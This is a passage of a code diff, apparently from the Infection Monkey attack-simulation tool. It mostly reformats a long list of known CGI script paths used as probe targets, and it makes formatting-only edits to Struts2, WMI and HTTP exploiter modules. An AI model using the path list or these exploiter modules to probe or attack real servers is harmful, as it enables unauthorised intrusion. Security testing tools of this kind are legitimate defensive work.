r'/cgi-bin/csv_db.cgi', - r'/cgi-bin/cvsblame.cgi', - r'/cgi-bin/cvslog.cgi', - r'/cgi-bin/cvsquery.cgi', - r'/cgi-bin/cvsqueryform.cgi', - r'/cgi-bin/day5datacopier.cgi', - r'/cgi-bin/day5datanotifier.cgi', - r'/cgi-bin/db_manager.cgi', - r'/cgi-bin/dbman/db.cgi', - r'/cgi-bin/dcforum.cgi', - r'/cgi-bin/dcshop.cgi', - r'/cgi-bin/dfire.cgi', - r'/cgi-bin/diagnose.cgi', - r'/cgi-bin/dig.cgi', - r'/cgi-bin/directorypro.cgi', - r'/cgi-bin/download.cgi', - r'/cgi-bin/e87_Ba79yo87.cgi', - r'/cgi-bin/emu/html/emumail.cgi', - r'/cgi-bin/emumail.cgi', - r'/cgi-bin/emumail/emumail.cgi', - r'/cgi-bin/enter.cgi', - r'/cgi-bin/environ.cgi', - r'/cgi-bin/ezadmin.cgi', - r'/cgi-bin/ezboard.cgi', - r'/cgi-bin/ezman.cgi', - r'/cgi-bin/ezshopper2/loadpage.cgi', - r'/cgi-bin/ezshopper3/loadpage.cgi', - r'/cgi-bin/ezshopper/loadpage.cgi', - r'/cgi-bin/ezshopper/search.cgi', - r'/cgi-bin/faqmanager.cgi', - r'/cgi-bin/FileSeek2.cgi', - r'/cgi-bin/FileSeek.cgi', - r'/cgi-bin/finger.cgi', - r'/cgi-bin/flexform.cgi', - r'/cgi-bin/fom.cgi', - r'/cgi-bin/fom/fom.cgi', - r'/cgi-bin/FormHandler.cgi', - r'/cgi-bin/FormMail.cgi', - r'/cgi-bin/gbadmin.cgi', - r'/cgi-bin/gbook/gbook.cgi', - r'/cgi-bin/generate.cgi', - r'/cgi-bin/getdoc.cgi', - r'/cgi-bin/gH.cgi', - r'/cgi-bin/gm-authors.cgi', - r'/cgi-bin/gm.cgi', - r'/cgi-bin/gm-cplog.cgi', - r'/cgi-bin/guestbook.cgi', - r'/cgi-bin/handler', - r'/cgi-bin/handler.cgi', - r'/cgi-bin/handler/netsonar', - r'/cgi-bin/hitview.cgi', - r'/cgi-bin/hsx.cgi', - r'/cgi-bin/html2chtml.cgi', - r'/cgi-bin/html2wml.cgi', - r'/cgi-bin/htsearch.cgi', - r'/cgi-bin/hw.sh', # testing - r'/cgi-bin/icat', - r'/cgi-bin/if/admin/nph-build.cgi', - r'/cgi-bin/ikonboard/help.cgi', - r'/cgi-bin/ImageFolio/admin/admin.cgi', - r'/cgi-bin/imageFolio.cgi', - r'/cgi-bin/index.cgi', - r'/cgi-bin/infosrch.cgi', - r'/cgi-bin/jammail.pl', - r'/cgi-bin/journal.cgi', - r'/cgi-bin/lastlines.cgi', - r'/cgi-bin/loadpage.cgi', - r'/cgi-bin/login.cgi', - r'/cgi-bin/logit.cgi', - r'/cgi-bin/log-reader.cgi', - r'/cgi-bin/lookwho.cgi', - r'/cgi-bin/lwgate.cgi', - r'/cgi-bin/MachineInfo', - r'/cgi-bin/MachineInfo', - r'/cgi-bin/magiccard.cgi', - r'/cgi-bin/mail/emumail.cgi', - r'/cgi-bin/maillist.cgi', - r'/cgi-bin/mailnews.cgi', - r'/cgi-bin/mail/nph-mr.cgi', - r'/cgi-bin/main.cgi', - r'/cgi-bin/main_menu.pl', - r'/cgi-bin/man.sh', - r'/cgi-bin/mini_logger.cgi', - r'/cgi-bin/mmstdod.cgi', - r'/cgi-bin/moin.cgi', - r'/cgi-bin/mojo/mojo.cgi', - r'/cgi-bin/mrtg.cgi', - r'/cgi-bin/mt.cgi', - r'/cgi-bin/mt/mt.cgi', - r'/cgi-bin/mt/mt-check.cgi', - r'/cgi-bin/mt/mt-load.cgi', - r'/cgi-bin/mt-static/mt-check.cgi', - r'/cgi-bin/mt-static/mt-load.cgi', - r'/cgi-bin/musicqueue.cgi', - r'/cgi-bin/myguestbook.cgi', - r'/cgi-bin/.namazu.cgi', - r'/cgi-bin/nbmember.cgi', - r'/cgi-bin/netauth.cgi', - r'/cgi-bin/netpad.cgi', - r'/cgi-bin/newsdesk.cgi', - r'/cgi-bin/nlog-smb.cgi', - r'/cgi-bin/nph-emumail.cgi', - r'/cgi-bin/nph-exploitscanget.cgi', - r'/cgi-bin/nph-publish.cgi', - r'/cgi-bin/nph-test.cgi', - r'/cgi-bin/pagelog.cgi', - r'/cgi-bin/pbcgi.cgi', - r'/cgi-bin/perlshop.cgi', - r'/cgi-bin/pfdispaly.cgi', - r'/cgi-bin/pfdisplay.cgi', - r'/cgi-bin/phf.cgi', - r'/cgi-bin/photo/manage.cgi', - r'/cgi-bin/photo/protected/manage.cgi', - r'/cgi-bin/php-cgi', - r'/cgi-bin/php.cgi', - r'/cgi-bin/php.fcgi', - r'/cgi-bin/ping.sh', - r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi', - r'/cgi-bin/pollssi.cgi', - r'/cgi-bin/postcards.cgi', - r'/cgi-bin/powerup/r.cgi', - r'/cgi-bin/printenv', - r'/cgi-bin/probecontrol.cgi', - r'/cgi-bin/profile.cgi', - r'/cgi-bin/publisher/search.cgi', - r'/cgi-bin/quickstore.cgi', - r'/cgi-bin/quizme.cgi', - r'/cgi-bin/ratlog.cgi', - r'/cgi-bin/r.cgi', - r'/cgi-bin/register.cgi', - r'/cgi-bin/replicator/webpage.cgi/', - r'/cgi-bin/responder.cgi', - r'/cgi-bin/robadmin.cgi', - r'/cgi-bin/robpoll.cgi', - r'/cgi-bin/rtpd.cgi', - r'/cgi-bin/sbcgi/sitebuilder.cgi', - r'/cgi-bin/scoadminreg.cgi', - r'/cgi-bin-sdb/printenv', - r'/cgi-bin/sdbsearch.cgi', - r'/cgi-bin/search', - r'/cgi-bin/search.cgi', - r'/cgi-bin/search/search.cgi', - r'/cgi-bin/sendform.cgi', - r'/cgi-bin/shop.cgi', - r'/cgi-bin/shopper.cgi', - r'/cgi-bin/shopplus.cgi', - r'/cgi-bin/showcheckins.cgi', - r'/cgi-bin/simplestguest.cgi', - r'/cgi-bin/simplestmail.cgi', - r'/cgi-bin/smartsearch.cgi', - r'/cgi-bin/smartsearch/smartsearch.cgi', - r'/cgi-bin/snorkerz.bat', - r'/cgi-bin/snorkerz.bat', - r'/cgi-bin/snorkerz.cmd', - r'/cgi-bin/snorkerz.cmd', - r'/cgi-bin/sojourn.cgi', - r'/cgi-bin/spin_client.cgi', - r'/cgi-bin/start.cgi', - r'/cgi-bin/status', - r'/cgi-bin/status_cgi', - r'/cgi-bin/store/agora.cgi', - r'/cgi-bin/store.cgi', - r'/cgi-bin/store/index.cgi', - r'/cgi-bin/survey.cgi', - r'/cgi-bin/sync.cgi', - r'/cgi-bin/talkback.cgi', - r'/cgi-bin/technote/main.cgi', - r'/cgi-bin/test2.pl', - r'/cgi-bin/test-cgi', - r'/cgi-bin/test.cgi', - r'/cgi-bin/testing_whatever', - r'/cgi-bin/test/test.cgi', - r'/cgi-bin/tidfinder.cgi', - r'/cgi-bin/tigvote.cgi', - r'/cgi-bin/title.cgi', - r'/cgi-bin/top.cgi', - r'/cgi-bin/traffic.cgi', - r'/cgi-bin/troops.cgi', - r'/cgi-bin/ttawebtop.cgi/', - r'/cgi-bin/ultraboard.cgi', - r'/cgi-bin/upload.cgi', - r'/cgi-bin/urlcount.cgi', - r'/cgi-bin/viewcvs.cgi', - r'/cgi-bin/view_help.cgi', - r'/cgi-bin/viralator.cgi', - r'/cgi-bin/virgil.cgi', - r'/cgi-bin/vote.cgi', - r'/cgi-bin/vpasswd.cgi', - r'/cgi-bin/way-board.cgi', - r'/cgi-bin/way-board/way-board.cgi', - r'/cgi-bin/webbbs.cgi', - r'/cgi-bin/webcart/webcart.cgi', - r'/cgi-bin/webdist.cgi', - r'/cgi-bin/webif.cgi', - r'/cgi-bin/webmail/html/emumail.cgi', - r'/cgi-bin/webmap.cgi', - r'/cgi-bin/webspirs.cgi', - r'/cgi-bin/Web_Store/web_store.cgi', - r'/cgi-bin/whois.cgi', - r'/cgi-bin/whois_raw.cgi', - r'/cgi-bin/whois/whois.cgi', - r'/cgi-bin/wrap', - r'/cgi-bin/wrap.cgi', - r'/cgi-bin/wwwboard.cgi.cgi', - r'/cgi-bin/YaBB/YaBB.cgi', - r'/cgi-bin/zml.cgi', - r'/cgi-mod/index.cgi', - r'/cgis/wwwboard/wwwboard.cgi', - r'/cgi-sys/addalink.cgi', - r'/cgi-sys/defaultwebpage.cgi', - r'/cgi-sys/domainredirect.cgi', - r'/cgi-sys/entropybanner.cgi', - r'/cgi-sys/entropysearch.cgi', - r'/cgi-sys/FormMail-clone.cgi', - r'/cgi-sys/helpdesk.cgi', - r'/cgi-sys/mchat.cgi', - r'/cgi-sys/randhtml.cgi', - r'/cgi-sys/realhelpdesk.cgi', - r'/cgi-sys/realsignup.cgi', - r'/cgi-sys/signup.cgi', - r'/connector.cgi', - r'/cp/rac/nsManager.cgi', - r'/create_release.sh', - r'/CSNews.cgi', - r'/csPassword.cgi', - r'/dcadmin.cgi', - r'/dcboard.cgi', - r'/dcforum.cgi', - r'/dcforum/dcforum.cgi', - r'/debuff.cgi', - r'/debug.cgi', - r'/details.cgi', - r'/edittag/edittag.cgi', - r'/emumail.cgi', - r'/enter_buff.cgi', - r'/enter_bug.cgi', - r'/ez2000/ezadmin.cgi', - r'/ez2000/ezboard.cgi', - r'/ez2000/ezman.cgi', - r'/fcgi-bin/echo', - r'/fcgi-bin/echo', - r'/fcgi-bin/echo2', - r'/fcgi-bin/echo2', - r'/Gozila.cgi', - r'/hitmatic/analyse.cgi', - r'/hp_docs/cgi-bin/index.cgi', - r'/html/cgi-bin/cgicso', - r'/html/cgi-bin/cgicso', - r'/index.cgi', - r'/info.cgi', - r'/infosrch.cgi', - r'/login.cgi', - r'/mailview.cgi', - r'/main.cgi', - r'/megabook/admin.cgi', - r'/ministats/admin.cgi', - r'/mods/apage/apage.cgi', - r'/_mt/mt.cgi', - r'/musicqueue.cgi', - r'/ncbook.cgi', - r'/newpro.cgi', - r'/newsletter.sh', - r'/oem_webstage/cgi-bin/oemapp_cgi', - r'/page.cgi', - r'/parse_xml.cgi', - r'/photodata/manage.cgi', - r'/photo/manage.cgi', - r'/print.cgi', - r'/process_buff.cgi', - r'/process_bug.cgi', - r'/pub/english.cgi', - r'/quikmail/nph-emumail.cgi', - r'/quikstore.cgi', - r'/reviews/newpro.cgi', - r'/ROADS/cgi-bin/search.pl', - r'/sample01.cgi', - r'/sample02.cgi', - r'/sample03.cgi', - r'/sample04.cgi', - r'/sampleposteddata.cgi', - r'/scancfg.cgi', - r'/scancfg.cgi', - r'/servers/link.cgi', - r'/setpasswd.cgi', - r'/SetSecurity.shm', - r'/shop/member_html.cgi', - r'/shop/normal_html.cgi', - r'/site_searcher.cgi', - r'/siteUserMod.cgi', - r'/submit.cgi', - r'/technote/print.cgi', - r'/template.cgi', - r'/test.cgi', - r'/ucsm/isSamInstalled.cgi', - r'/upload.cgi', - r'/userreg.cgi', - r'/users/scripts/submit.cgi', - r'/vood/cgi-bin/vood_view.cgi', - r'/Web_Store/web_store.cgi', - r'/webtools/bonsai/ccvsblame.cgi', - r'/webtools/bonsai/cvsblame.cgi', - r'/webtools/bonsai/cvslog.cgi', - r'/webtools/bonsai/cvsquery.cgi', - r'/webtools/bonsai/cvsqueryform.cgi', - r'/webtools/bonsai/showcheckins.cgi', - r'/wwwadmin.cgi', - r'/wwwboard.cgi', - r'/wwwboard/wwwboard.cgi') \ No newline at end of file +CGI_FILES = ( + r'/', + r'/admin.cgi', + r'/administrator.cgi', + r'/agora.cgi', + r'/aktivate/cgi-bin/catgy.cgi', + r'/analyse.cgi', + r'/apps/web/vs_diag.cgi', + r'/axis-cgi/buffer/command.cgi', + r'/b2-include/b2edit.showposts.php', + r'/bandwidth/index.cgi', + r'/bigconf.cgi', + r'/cartcart.cgi', + r'/cart.cgi', + r'/ccbill/whereami.cgi', + r'/cgi-bin/14all-1.1.cgi', + r'/cgi-bin/14all.cgi', + r'/cgi-bin/a1disp3.cgi', + r'/cgi-bin/a1stats/a1disp3.cgi', + r'/cgi-bin/a1stats/a1disp4.cgi', + r'/cgi-bin/addbanner.cgi', + r'/cgi-bin/add_ftp.cgi', + r'/cgi-bin/adduser.cgi', + r'/cgi-bin/admin/admin.cgi', + r'/cgi-bin/admin.cgi', + r'/cgi-bin/admin/getparam.cgi', + r'/cgi-bin/adminhot.cgi', + r'/cgi-bin/admin.pl', + r'/cgi-bin/admin/setup.cgi', + r'/cgi-bin/adminwww.cgi', + r'/cgi-bin/af.cgi', + r'/cgi-bin/aglimpse.cgi', + r'/cgi-bin/alienform.cgi', + r'/cgi-bin/AnyBoard.cgi', + r'/cgi-bin/architext_query.cgi', + r'/cgi-bin/astrocam.cgi', + r'/cgi-bin/AT-admin.cgi', + r'/cgi-bin/AT-generate.cgi', + r'/cgi-bin/auction/auction.cgi', + r'/cgi-bin/auktion.cgi', + r'/cgi-bin/ax-admin.cgi', + r'/cgi-bin/ax.cgi', + r'/cgi-bin/axs.cgi', + r'/cgi-bin/badmin.cgi', + r'/cgi-bin/banner.cgi', + r'/cgi-bin/bannereditor.cgi', + r'/cgi-bin/bb-ack.sh', + r'/cgi-bin/bb-histlog.sh', + r'/cgi-bin/bb-hist.sh', + r'/cgi-bin/bb-hostsvc.sh', + r'/cgi-bin/bb-replog.sh', + r'/cgi-bin/bb-rep.sh', + r'/cgi-bin/bbs_forum.cgi', + r'/cgi-bin/bigconf.cgi', + r'/cgi-bin/bizdb1-search.cgi', + r'/cgi-bin/blog/mt-check.cgi', + r'/cgi-bin/blog/mt-load.cgi', + r'/cgi-bin/bnbform.cgi', + r'/cgi-bin/book.cgi', + r'/cgi-bin/boozt/admin/index.cgi', + r'/cgi-bin/bsguest.cgi', + r'/cgi-bin/bslist.cgi', + r'/cgi-bin/build.cgi', + r'/cgi-bin/bulk/bulk.cgi', + r'/cgi-bin/cached_feed.cgi', + r'/cgi-bin/cachemgr.cgi', + r'/cgi-bin/calendar/index.cgi', + r'/cgi-bin/cartmanager.cgi', + r'/cgi-bin/cbmc/forums.cgi', + r'/cgi-bin/ccvsblame.cgi', + r'/cgi-bin/c_download.cgi', + r'/cgi-bin/cgforum.cgi', + r'/cgi-bin/.cgi', + r'/cgi-bin/cgi_process', + r'/cgi-bin/classified.cgi', + r'/cgi-bin/classifieds.cgi', + r'/cgi-bin/classifieds/classifieds.cgi', + r'/cgi-bin/classifieds/index.cgi', + r'/cgi-bin/.cobalt/alert/service.cgi', + r'/cgi-bin/.cobalt/message/message.cgi', + r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi', + r'/cgi-bin/commandit.cgi', + r'/cgi-bin/commerce.cgi', + r'/cgi-bin/common/listrec.pl', + r'/cgi-bin/compatible.cgi', + r'/cgi-bin/Count.cgi', + r'/cgi-bin/csChatRBox.cgi', + r'/cgi-bin/csGuestBook.cgi', + r'/cgi-bin/csLiveSupport.cgi', + r'/cgi-bin/CSMailto.cgi', + r'/cgi-bin/CSMailto/CSMailto.cgi', + r'/cgi-bin/csNews.cgi', + r'/cgi-bin/csNewsPro.cgi', + r'/cgi-bin/csPassword.cgi', + r'/cgi-bin/csPassword/csPassword.cgi', + r'/cgi-bin/csSearch.cgi', + r'/cgi-bin/csv_db.cgi', + r'/cgi-bin/cvsblame.cgi', + r'/cgi-bin/cvslog.cgi', + r'/cgi-bin/cvsquery.cgi', + r'/cgi-bin/cvsqueryform.cgi', + r'/cgi-bin/day5datacopier.cgi', + r'/cgi-bin/day5datanotifier.cgi', + r'/cgi-bin/db_manager.cgi', + r'/cgi-bin/dbman/db.cgi', + r'/cgi-bin/dcforum.cgi', + r'/cgi-bin/dcshop.cgi', + r'/cgi-bin/dfire.cgi', + r'/cgi-bin/diagnose.cgi', + r'/cgi-bin/dig.cgi', + r'/cgi-bin/directorypro.cgi', + r'/cgi-bin/download.cgi', + r'/cgi-bin/e87_Ba79yo87.cgi', + r'/cgi-bin/emu/html/emumail.cgi', + r'/cgi-bin/emumail.cgi', + r'/cgi-bin/emumail/emumail.cgi', + r'/cgi-bin/enter.cgi', + r'/cgi-bin/environ.cgi', + r'/cgi-bin/ezadmin.cgi', + r'/cgi-bin/ezboard.cgi', + r'/cgi-bin/ezman.cgi', + r'/cgi-bin/ezshopper2/loadpage.cgi', + r'/cgi-bin/ezshopper3/loadpage.cgi', + r'/cgi-bin/ezshopper/loadpage.cgi', + r'/cgi-bin/ezshopper/search.cgi', + r'/cgi-bin/faqmanager.cgi', + r'/cgi-bin/FileSeek2.cgi', + r'/cgi-bin/FileSeek.cgi', + r'/cgi-bin/finger.cgi', + r'/cgi-bin/flexform.cgi', + r'/cgi-bin/fom.cgi', + r'/cgi-bin/fom/fom.cgi', + r'/cgi-bin/FormHandler.cgi', + r'/cgi-bin/FormMail.cgi', + r'/cgi-bin/gbadmin.cgi', + r'/cgi-bin/gbook/gbook.cgi', + r'/cgi-bin/generate.cgi', + r'/cgi-bin/getdoc.cgi', + r'/cgi-bin/gH.cgi', + r'/cgi-bin/gm-authors.cgi', + r'/cgi-bin/gm.cgi', + r'/cgi-bin/gm-cplog.cgi', + r'/cgi-bin/guestbook.cgi', + r'/cgi-bin/handler', + r'/cgi-bin/handler.cgi', + r'/cgi-bin/handler/netsonar', + r'/cgi-bin/hitview.cgi', + r'/cgi-bin/hsx.cgi', + r'/cgi-bin/html2chtml.cgi', + r'/cgi-bin/html2wml.cgi', + r'/cgi-bin/htsearch.cgi', + r'/cgi-bin/hw.sh', # testing + r'/cgi-bin/icat', + r'/cgi-bin/if/admin/nph-build.cgi', + r'/cgi-bin/ikonboard/help.cgi', + r'/cgi-bin/ImageFolio/admin/admin.cgi', + r'/cgi-bin/imageFolio.cgi', + r'/cgi-bin/index.cgi', + r'/cgi-bin/infosrch.cgi', + r'/cgi-bin/jammail.pl', + r'/cgi-bin/journal.cgi', + r'/cgi-bin/lastlines.cgi', + r'/cgi-bin/loadpage.cgi', + r'/cgi-bin/login.cgi', + r'/cgi-bin/logit.cgi', + r'/cgi-bin/log-reader.cgi', + r'/cgi-bin/lookwho.cgi', + r'/cgi-bin/lwgate.cgi', + r'/cgi-bin/MachineInfo', + r'/cgi-bin/MachineInfo', + r'/cgi-bin/magiccard.cgi', + r'/cgi-bin/mail/emumail.cgi', + r'/cgi-bin/maillist.cgi', + r'/cgi-bin/mailnews.cgi', + r'/cgi-bin/mail/nph-mr.cgi', + r'/cgi-bin/main.cgi', + r'/cgi-bin/main_menu.pl', + r'/cgi-bin/man.sh', + r'/cgi-bin/mini_logger.cgi', + r'/cgi-bin/mmstdod.cgi', + r'/cgi-bin/moin.cgi', + r'/cgi-bin/mojo/mojo.cgi', + r'/cgi-bin/mrtg.cgi', + r'/cgi-bin/mt.cgi', + r'/cgi-bin/mt/mt.cgi', + r'/cgi-bin/mt/mt-check.cgi', + r'/cgi-bin/mt/mt-load.cgi', + r'/cgi-bin/mt-static/mt-check.cgi', + r'/cgi-bin/mt-static/mt-load.cgi', + r'/cgi-bin/musicqueue.cgi', + r'/cgi-bin/myguestbook.cgi', + r'/cgi-bin/.namazu.cgi', + r'/cgi-bin/nbmember.cgi', + r'/cgi-bin/netauth.cgi', + r'/cgi-bin/netpad.cgi', + r'/cgi-bin/newsdesk.cgi', + r'/cgi-bin/nlog-smb.cgi', + r'/cgi-bin/nph-emumail.cgi', + r'/cgi-bin/nph-exploitscanget.cgi', + r'/cgi-bin/nph-publish.cgi', + r'/cgi-bin/nph-test.cgi', + r'/cgi-bin/pagelog.cgi', + r'/cgi-bin/pbcgi.cgi', + r'/cgi-bin/perlshop.cgi', + r'/cgi-bin/pfdispaly.cgi', + r'/cgi-bin/pfdisplay.cgi', + r'/cgi-bin/phf.cgi', + r'/cgi-bin/photo/manage.cgi', + r'/cgi-bin/photo/protected/manage.cgi', + r'/cgi-bin/php-cgi', + r'/cgi-bin/php.cgi', + r'/cgi-bin/php.fcgi', + r'/cgi-bin/ping.sh', + r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi', + r'/cgi-bin/pollssi.cgi', + r'/cgi-bin/postcards.cgi', + r'/cgi-bin/powerup/r.cgi', + r'/cgi-bin/printenv', + r'/cgi-bin/probecontrol.cgi', + r'/cgi-bin/profile.cgi', + r'/cgi-bin/publisher/search.cgi', + r'/cgi-bin/quickstore.cgi', + r'/cgi-bin/quizme.cgi', + r'/cgi-bin/ratlog.cgi', + r'/cgi-bin/r.cgi', + r'/cgi-bin/register.cgi', + r'/cgi-bin/replicator/webpage.cgi/', + r'/cgi-bin/responder.cgi', + r'/cgi-bin/robadmin.cgi', + r'/cgi-bin/robpoll.cgi', + r'/cgi-bin/rtpd.cgi', + r'/cgi-bin/sbcgi/sitebuilder.cgi', + r'/cgi-bin/scoadminreg.cgi', + r'/cgi-bin-sdb/printenv', + r'/cgi-bin/sdbsearch.cgi', + r'/cgi-bin/search', + r'/cgi-bin/search.cgi', + r'/cgi-bin/search/search.cgi', + r'/cgi-bin/sendform.cgi', + r'/cgi-bin/shop.cgi', + r'/cgi-bin/shopper.cgi', + r'/cgi-bin/shopplus.cgi', + r'/cgi-bin/showcheckins.cgi', + r'/cgi-bin/simplestguest.cgi', + r'/cgi-bin/simplestmail.cgi', + r'/cgi-bin/smartsearch.cgi', + r'/cgi-bin/smartsearch/smartsearch.cgi', + r'/cgi-bin/snorkerz.bat', + r'/cgi-bin/snorkerz.bat', + r'/cgi-bin/snorkerz.cmd', + r'/cgi-bin/snorkerz.cmd', + r'/cgi-bin/sojourn.cgi', + r'/cgi-bin/spin_client.cgi', + r'/cgi-bin/start.cgi', + r'/cgi-bin/status', + r'/cgi-bin/status_cgi', + r'/cgi-bin/store/agora.cgi', + r'/cgi-bin/store.cgi', + r'/cgi-bin/store/index.cgi', + r'/cgi-bin/survey.cgi', + r'/cgi-bin/sync.cgi', + r'/cgi-bin/talkback.cgi', + r'/cgi-bin/technote/main.cgi', + r'/cgi-bin/test2.pl', + r'/cgi-bin/test-cgi', + r'/cgi-bin/test.cgi', + r'/cgi-bin/testing_whatever', + r'/cgi-bin/test/test.cgi', + r'/cgi-bin/tidfinder.cgi', + r'/cgi-bin/tigvote.cgi', + r'/cgi-bin/title.cgi', + r'/cgi-bin/top.cgi', + r'/cgi-bin/traffic.cgi', + r'/cgi-bin/troops.cgi', + r'/cgi-bin/ttawebtop.cgi/', + r'/cgi-bin/ultraboard.cgi', + r'/cgi-bin/upload.cgi', + r'/cgi-bin/urlcount.cgi', + r'/cgi-bin/viewcvs.cgi', + r'/cgi-bin/view_help.cgi', + r'/cgi-bin/viralator.cgi', + r'/cgi-bin/virgil.cgi', + r'/cgi-bin/vote.cgi', + r'/cgi-bin/vpasswd.cgi', + r'/cgi-bin/way-board.cgi', + r'/cgi-bin/way-board/way-board.cgi', + r'/cgi-bin/webbbs.cgi', + r'/cgi-bin/webcart/webcart.cgi', + r'/cgi-bin/webdist.cgi', + r'/cgi-bin/webif.cgi', + r'/cgi-bin/webmail/html/emumail.cgi', + r'/cgi-bin/webmap.cgi', + r'/cgi-bin/webspirs.cgi', + r'/cgi-bin/Web_Store/web_store.cgi', + r'/cgi-bin/whois.cgi', + r'/cgi-bin/whois_raw.cgi', + r'/cgi-bin/whois/whois.cgi', + r'/cgi-bin/wrap', + r'/cgi-bin/wrap.cgi', + r'/cgi-bin/wwwboard.cgi.cgi', + r'/cgi-bin/YaBB/YaBB.cgi', + r'/cgi-bin/zml.cgi', + r'/cgi-mod/index.cgi', + r'/cgis/wwwboard/wwwboard.cgi', + r'/cgi-sys/addalink.cgi', + r'/cgi-sys/defaultwebpage.cgi', + r'/cgi-sys/domainredirect.cgi', + r'/cgi-sys/entropybanner.cgi', + r'/cgi-sys/entropysearch.cgi', + r'/cgi-sys/FormMail-clone.cgi', + r'/cgi-sys/helpdesk.cgi', + r'/cgi-sys/mchat.cgi', + r'/cgi-sys/randhtml.cgi', + r'/cgi-sys/realhelpdesk.cgi', + r'/cgi-sys/realsignup.cgi', + r'/cgi-sys/signup.cgi', + r'/connector.cgi', + r'/cp/rac/nsManager.cgi', + r'/create_release.sh', + r'/CSNews.cgi', + r'/csPassword.cgi', + r'/dcadmin.cgi', + r'/dcboard.cgi', + r'/dcforum.cgi', + r'/dcforum/dcforum.cgi', + r'/debuff.cgi', + r'/debug.cgi', + r'/details.cgi', + r'/edittag/edittag.cgi', + r'/emumail.cgi', + r'/enter_buff.cgi', + r'/enter_bug.cgi', + r'/ez2000/ezadmin.cgi', + r'/ez2000/ezboard.cgi', + r'/ez2000/ezman.cgi', + r'/fcgi-bin/echo', + r'/fcgi-bin/echo', + r'/fcgi-bin/echo2', + r'/fcgi-bin/echo2', + r'/Gozila.cgi', + r'/hitmatic/analyse.cgi', + r'/hp_docs/cgi-bin/index.cgi', + r'/html/cgi-bin/cgicso', + r'/html/cgi-bin/cgicso', + r'/index.cgi', + r'/info.cgi', + r'/infosrch.cgi', + r'/login.cgi', + r'/mailview.cgi', + r'/main.cgi', + r'/megabook/admin.cgi', + r'/ministats/admin.cgi', + r'/mods/apage/apage.cgi', + r'/_mt/mt.cgi', + r'/musicqueue.cgi', + r'/ncbook.cgi', + r'/newpro.cgi', + r'/newsletter.sh', + r'/oem_webstage/cgi-bin/oemapp_cgi', + r'/page.cgi', + r'/parse_xml.cgi', + r'/photodata/manage.cgi', + r'/photo/manage.cgi', + r'/print.cgi', + r'/process_buff.cgi', + r'/process_bug.cgi', + r'/pub/english.cgi', + r'/quikmail/nph-emumail.cgi', + r'/quikstore.cgi', + r'/reviews/newpro.cgi', + r'/ROADS/cgi-bin/search.pl', + r'/sample01.cgi', + r'/sample02.cgi', + r'/sample03.cgi', + r'/sample04.cgi', + r'/sampleposteddata.cgi', + r'/scancfg.cgi', + r'/scancfg.cgi', + r'/servers/link.cgi', + r'/setpasswd.cgi', + r'/SetSecurity.shm', + r'/shop/member_html.cgi', + r'/shop/normal_html.cgi', + r'/site_searcher.cgi', + r'/siteUserMod.cgi', + r'/submit.cgi', + r'/technote/print.cgi', + r'/template.cgi', + r'/test.cgi', + r'/ucsm/isSamInstalled.cgi', + r'/upload.cgi', + r'/userreg.cgi', + r'/users/scripts/submit.cgi', + r'/vood/cgi-bin/vood_view.cgi', + r'/Web_Store/web_store.cgi', + r'/webtools/bonsai/ccvsblame.cgi', + r'/webtools/bonsai/cvsblame.cgi', + r'/webtools/bonsai/cvslog.cgi', + r'/webtools/bonsai/cvsquery.cgi', + r'/webtools/bonsai/cvsqueryform.cgi', + r'/webtools/bonsai/showcheckins.cgi', + r'/wwwadmin.cgi', + r'/wwwboard.cgi', + r'/wwwboard/wwwboard.cgi' +) diff --git a/monkey/infection_monkey/exploit/struts2.py b/monkey/infection_monkey/exploit/struts2.py index fc2fd764d..9aba749a7 100644 --- a/monkey/infection_monkey/exploit/struts2.py +++ b/monkey/infection_monkey/exploit/struts2.py @@ -3,13 +3,14 @@ code used is from https://www.exploit-db.com/exploits/41570/ Vulnerable struts2 versions <=2.3.31 and <=2.5.10 """ -import urllib.request, urllib.error, urllib.parse import http.client -import unicodedata +import logging import re import ssl +import urllib.error +import urllib.parse +import urllib.request -import logging from infection_monkey.exploit.web_rce import WebRCE __author__ = "VakarisZ" diff --git a/monkey/infection_monkey/exploit/tools/http_tools.py b/monkey/infection_monkey/exploit/tools/http_tools.py index 297e064fc..b31e67137 100644 --- a/monkey/infection_monkey/exploit/tools/http_tools.py +++ b/monkey/infection_monkey/exploit/tools/http_tools.py @@ -1,14 +1,16 @@ import logging import os import os.path -import urllib.request, urllib.parse, urllib.error +import urllib.error +import urllib.parse +import urllib.request from threading import Lock +from infection_monkey.exploit.tools.helpers import try_get_target_monkey, get_interface_to_target +from infection_monkey.model import DOWNLOAD_TIMEOUT from infection_monkey.network.firewall import app as firewall from infection_monkey.network.info import get_free_tcp_port from infection_monkey.transport import HTTPServer, LockedHTTPServer -from infection_monkey.exploit.tools.helpers import try_get_target_monkey, get_interface_to_target -from infection_monkey.model import DOWNLOAD_TIMEOUT __author__ = 'itamar' diff --git a/monkey/infection_monkey/exploit/wmiexec.py b/monkey/infection_monkey/exploit/wmiexec.py index a1da97efe..257cfd469 100644 --- a/monkey/infection_monkey/exploit/wmiexec.py +++ b/monkey/infection_monkey/exploit/wmiexec.py @@ -39,7 +39,8 @@ class WmiExploiter(HostExploiter): password_hashed = self._config.hash_sensitive_data(password) lm_hash_hashed = self._config.hash_sensitive_data(lm_hash) mtlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash) - creds_for_logging = "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): ({},{},{},{})".format(user, password_hashed, lm_hash_hashed, mtlm_hash_hashed) + creds_for_logging = "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): " \ + "({},{},{},{})".format(user, password_hashed, lm_hash_hashed, mtlm_hash_hashed) LOG.debug(("Attempting to connect %r using WMI with " % self.host) + creds_for_logging) wmi_connection = WmiTools.WmiConnection() diff --git a/monkey/infection_monkey/main.py b/monkey/infection_monkey/main.py index 88b7f9fd9..928425535 100644 --- a/monkey/infection_monkey/main.py +++ b/monkey/infection_monkey/main.py @@ -1,5 +1,3 @@ - - import argparse import json import logging @@ -23,8 +21,11 @@ LOG = None LOG_CONFIG = {'version': 1, 'disable_existing_loggers': False, - 'formatters': {'standard': { - 'format': '%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s'}, + 'formatters': { + 'standard': { + 'format': + '%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s' + }, }, 'handlers': {'console': {'class': 'logging.StreamHandler', 'level': 'DEBUG', diff --git 